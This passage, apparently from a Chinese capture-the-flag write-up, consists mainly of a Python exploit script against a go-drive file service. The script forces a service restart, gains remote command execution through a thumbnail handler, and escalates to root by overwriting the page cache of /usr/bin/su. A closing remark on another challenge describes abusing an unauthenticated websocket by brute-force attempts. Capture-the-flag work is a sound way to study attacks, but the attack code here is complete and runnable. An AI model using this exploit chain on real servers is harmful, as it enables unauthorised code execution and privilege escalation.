self.api(f"/admin/drive/{BOOM}/init", method="POST", data="{}", ctype="application/json")
self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
self.get_entry(f"{BOOM}/x.txt")
def trigger_restart(self):
self.log("触发 boom thumbnail,强制 go-drive 重启")
entry = self.get_entry(f"{BOOM}/x.txt")
key = entry["meta"]["accessKey"]
self.req("/thumbnail/" + f"{BOOM}/x.txt" + "?_k=" + urllib.parse.quote(key, safe=""), timeout=10)
self.wait_service_back()
def wait_service_back(self):
self.log("等待 go-drive 恢复")
for _ in range(15):
try:
self.auth()
return
except Exception:
time.sleep(1)
raise RuntimeError("go-drive 长时间未恢复")
def shell_cmd(self, cmd):
self.save_file(CMD_PATH, cmd.rstrip("\\n") + "\\n")
entry = self.get_entry(CMD_PATH)
key = entry["meta"]["accessKey"]
body, status = self.req("/thumbnail/" + CMD_PATH + "?_k=" + urllib.parse.quote(key, safe=""), timeout=120)
return body, status
def verify_rce(self):
self.log("验证 app 级 shell RCE")
body, status = self.shell_cmd("whoami\\nid\\npwd")
if status != 200 or "uid=" not in body:
raise RuntimeError(f"RCE 验证失败: HTTP {status} {body}")
self.log("RCE OK")
def patch_su_pagecache(self):
self.log("用 copy.fail 思路覆写 /usr/bin/su 页缓存")
body, status = self.shell_cmd(COPY_FAIL_PATCH_CMD)
if status != 200 or "PATCHED_SU" not in body:
raise RuntimeError(f"copy.fail patch 失败: HTTP {status} {body}")
def poll_flag(self, timeout=420, interval=5):
self.log("轮询 /ancient/f,等待 root cron 落出 flag")
deadline = time.time() + timeout
urls = [
self.root_base + "/ancient/f",
self.root_base + "/data/f",
]
while time.time() < deadline:
for url in urls:
try:
with urllib.request.urlopen(url, timeout=10) as resp:
body = resp.read().decode("utf-8", "ignore")
text = body.strip()
if "flag{" in text.lower() or "actf{" in text.lower():
return text
if text and "File Download Service" not in text and "<html" not in text.lower():
return text
except Exception:
pass
time.sleep(interval)
raise RuntimeError("轮询超时,flag 还没出现")
def main():
parser = argparse.ArgumentParser(description="Exploit Real DLsite and print the flag")
parser.add_argument("--base", required=True, help="base URL, e.g. <http://host>:port or <http://host>:port/new")
parser.add_argument("--user", default=DEFAULT_USER)
parser.add_argument("--password", default=DEFAULT_PASSWORD)
parser.add_argument("--timeout", type=int, default=420, help="flag polling timeout in seconds")
args = parser.parse_args()
api_base, root_base = normalize_base(args.base)
exp = Exploit(api_base, root_base, args.user, args.password)
exp.auth()
exp.ensure_rootish()
exp.ensure_shell_handler()
exp.ensure_boom()
exp.trigger_restart()
exp.verify_rce()
exp.patch_su_pagecache()
flag = exp.poll_flag(timeout=args.timeout)
print(flag)
if __name__ == "__main__":
main()
master of album
websocket没鉴权,可以使用任意token去打,题目也是静态flag
因此机会无限多,只需要尽可能多的尝试一定能做出来
或者让AI写个脚本去爬题库